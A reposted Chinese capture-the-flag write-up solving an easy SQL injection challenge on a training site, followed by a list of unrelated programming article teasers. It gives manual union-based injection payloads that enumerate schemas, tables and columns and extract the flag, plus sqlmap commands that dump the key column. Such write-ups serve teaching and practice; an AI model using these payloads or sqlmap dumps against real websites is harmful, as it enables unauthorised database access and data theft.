CTF 这个看起来有点简单

这个看起来有点简单分值:10

  • 来源: 西普学院
  • 难度:易

很明显。过年过节不送礼,送礼就送这个

格式:

解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1


解法:

1.手工注入

 

id=1'

id=1 and 1=1

id=1 and 1=2                          判断是sql注入

id=1 order by 2                       两个字节

id=1 union select 1,2               回显2

爆数据库:

 and 1=2 union select 1,schema_name  from information_schema.schemata limit 0,2

                 information_schema     my_db

爆表:

and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,2

                           news           thiskey

爆字段:

and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,3

                                id        content           k0y

爆内容:

and 1=2 union select 1,k0y from thiskey

key=>           whati0MyD9ldump

sqlmap解法:

列 数据库:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs


列表:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables


列字段:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns
这个跑不出来。直接用下面的可以,但是需要知道k0y。

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump


得出结果,但是需要把1改为l,不知道为什么。




本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/466945.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

操作系统,你搞定了没?

操作系统,你搞定了没?

#书籍赠送操作系统一直是比较难学的知识,要学好操作系统的相关内容,需要对硬件、软件、宏观、微观、有非常深刻的理解,而能找到一本讲解比较好的书籍也是非常难得的,恰好,最近有出版社的朋友推荐了这样的一本书籍&…
阅读更多...
自学python前戏

自学python前戏

为什么需要学python? 一直有这个打算,但总是没有下决心开始。 听说python语言结构简洁优美,功能性强大,可移植性高,各大网站都在用python开发。学习python的想法再一次涌上心头。未来10年到底哪种语言会独领风骚&#…
阅读更多...
webcast(利用sharepoint Designer 定制 Office SharePoint Server 2007)学习笔记

webcast(利用sharepoint Designer 定制 Office SharePoint Server 2007)学习笔记

讲 师:侯钟雷 微软特约讲师 北京易学育通科技发展有限公司时 间:90 分钟 下载地址:下载地址(需先注册,不过很快)讲座内容:SharePoint Designer是原Frontpage网页工具的演进版本,除了保持了原有强大的功能外,更增加了对SharePoint技术的…
阅读更多...
C++ 的几个for 循环,范围for语句

C++ 的几个for 循环,范围for语句

我认为做嵌入式开发也需要学习C开发,可能我们学习的不只是一种编程语言,而是一种编程思想,C相对于C语言来说,会需要更多的想象力,原因就是C的特点太多了。不过,我们可以通过学习C的知识,来掌握面…
阅读更多...
51单片机——多功能电子钟

51单片机——多功能电子钟

单片机——多功能电子钟 宗旨:技术的学习是有限的,分享的精神是无限的。 实现的功能有:走 时、校时、闹钟、温度、遥控这几个功能。要想实现这几个功能,其中走时所需要的就是时 钟芯片,即 DS1302;时间需要…
阅读更多...
用数学运算实现数据无损压缩的算法

用数学运算实现数据无损压缩的算法

用数学运算实现数据无损压缩的算法<?xml:namespace prefix o ns "urn:schemas-microsoft-com:office:office" />(An arithmetic On Lossless Data-Compress By Mathematical Operation)王春海1 魏玉冬2&#xff08;[1]河北经贸大学信息技术学院 2河北经贸…
阅读更多...
dubbo的监控中心

dubbo的监控中心

监控中心实际上就是一个web工程。 是dubbo官方给我们提供的一个war包。 只需要部署在Tomcat中就可以了。 推荐把监控中心与注册中心部署在一台服务器上&#xff0c;这样可以不需要任何配置。 部署完成后直接启动Tomcat就可以使用。 注&#xff1a;tail -f logs/catalina.out即可…
阅读更多...
​我敢说,这是最全的常用设计模式汇总

​我敢说,这是最全的常用设计模式汇总

今天&#xff0c;想跟大家聊聊代码能力的提升。想起我刚入行那会&#xff0c;怀抱满腔激情&#xff0c;到处学热门框架&#xff0c;但实际上受限于公司体量和业务逻辑&#xff0c;其实往往用不上&#xff0c;时间久了&#xff0c;不用就忘记了&#xff0c;于是在日复一日的工作…
阅读更多...
嵌入式高手之路

嵌入式高手之路

嵌入式高手之路 宗旨&#xff1a;技术的学习是有限的&#xff0c;分享的精神是无限的。 第一部分&#xff1a;LINUX平台搭建与环境熟悉 了解Linux系统&#xff1b;区分各种版本的Linux系统&#xff0c;以便于拓展 Linux视野。 1、Linux 简介&#xff1b; 2、Linux 系统的主要…
阅读更多...
Meterpreter Guide

Meterpreter Guide

转载&#xff1a;http://wooyun.jozxing.cc/static/drops/tips-10146.html 0x01 入门篇(生成与接收) 功能介绍 msfpayload和msfencode已经被时代淘汰了现在都转为msfvenom了 msfvenom命令行选项如下&#xff1a;Options:-p, --payload payload> 指定需要使用的…
阅读更多...
跟老肖聊天

跟老肖聊天

今天跟一个创业的朋友老肖聊天&#xff0c;聊完之后有点沉重老肖是我的朋友&#xff0c;我讲的都是基于真实的内容&#xff0c;如果觉得我是吹牛或者过分如何&#xff0c;可以绕道&#xff0c;也请嘴下留情。老肖因为公司不景气&#xff0c;这两天出去面试&#xff0c;面试了三…
阅读更多...
SSM中(Spring-SpringMVC-Mybatis)(一:概念)

SSM中(Spring-SpringMVC-Mybatis)(一:概念)

一&#xff1a;Spring&#xff1a; 参照我的另一篇博客&#xff1a; http://www.cnblogs.com/GH0522/p/8127530.html 二:SpringMVC: 流程图&#xff1a; SpringMVC接口解释 DispatcherServlet&#xff1a; Spring提供的前端控制器&#xff0c;所有的请求都有经过它来统一分…
阅读更多...
关于VISIO工具栏、菜单栏消失的解决办法

关于VISIO工具栏、菜单栏消失的解决办法

关于VISIO工具栏、菜单栏消失的解决办法1、打开注册表编辑器。2、VISIO 2000HKEY_CURRENT_USER\Software\Visio\Visio2000\Toolbars删除上述键值&#xff0c;再启动VISIO 2000就可以看到工具栏和菜单栏了。3、VISIO 2002HKEY_CURRENT_USER\Software\Microsoft\Visio\Toolbars删…
阅读更多...
嵌入式软件书籍

嵌入式软件书籍

嵌入式书籍推荐 宗旨&#xff1a;技术的学习是有限的&#xff0c;分享的精神是无限的。 Linux基础 1、《Linux与Unix Shell 编程指南》 C语言基础    1、《C Primer Plus&#xff0c;5th Edition》【美】Stephen Prata着    2、《The C Programming Language, 2nd Ed…
阅读更多...
C语言函数库

C语言函数库

sqrt() - C函数 C库函数 double sqrt(double x) 返回x的平方根。 声明 下面是函数sqrt()声明。 double sqrt(double x) 参数 x -- 这是浮点值。 返回值 这个函数返回x的平方根。 例子 下面的例子演示了如何使用sqrt()函数。 #include <stdio.h> #include <math.h>…
阅读更多...
C++实现一个栈

C++实现一个栈

我们先说下栈的知识&#xff0c;先看下我们之前写的文章栈&#xff0c;C语言实现如何自己实现一个栈堆和栈的区别&#xff08;转过无数次的文章&#xff09;这是一个栈这是我们把数据入栈的操作这是数据出栈的操作之前僚机号里面发了一个用C实现的栈文章&#xff0c;比较简单&a…
阅读更多...
ApiController得到服务器端绝对路径

ApiController得到服务器端绝对路径

System.Web.Hosting.HostingEnvironment.MapPath("路径"); MSDN资料 将虚拟路径映射到服务器上的物理路径。 命名空间&#xff1a; System.Web.Hosting程序集&#xff1a; System.Web&#xff08;在 System.Web.dll 中&#xff09; 语法 public static string Map…
阅读更多...
SVN的恢复历险记

SVN的恢复历险记

今天&#xff0c;同事的机器可能出问题了。自动将Subversion服务器上的Source目录删除并且还Commit了。这可是框架部分的全部代码啊。不过没关系&#xff0c;好在Subversion的功能很强大。 方法很多&#xff1a; 1、选择Subversion --> Show Log&#xff0c;打开Log对话框&a…
阅读更多...
JavaScript——文档对象模型

JavaScript——文档对象模型

一、基本概念 文档对象模型&#xff08;DOM&#xff09;是表示文档和访问、操作构成文档的各种元素的应用程序接口&#xff08;API&#xff09;。它解决了NetScape的JavaScript和Microsoft的JavaScript之间的冲突&#xff0c;给web设计师和开发者一个标准的方法&#xff0c;可让…
阅读更多...
colinux的安装

colinux的安装

colinux安装 宗旨&#xff1a;技术的学习是有限的&#xff0c;分享的精神是无限的。 一、在windows上模拟linux环境&#xff0c;主要有三种方法&#xff1a; 1.VMware等虚拟机&#xff0c;缺点&#xff1a;占用系统资源多&#xff0c;运行速度慢。 2.Cygwin等模拟环境&#…
阅读更多...
最新文章

Copyright @ 2022~2023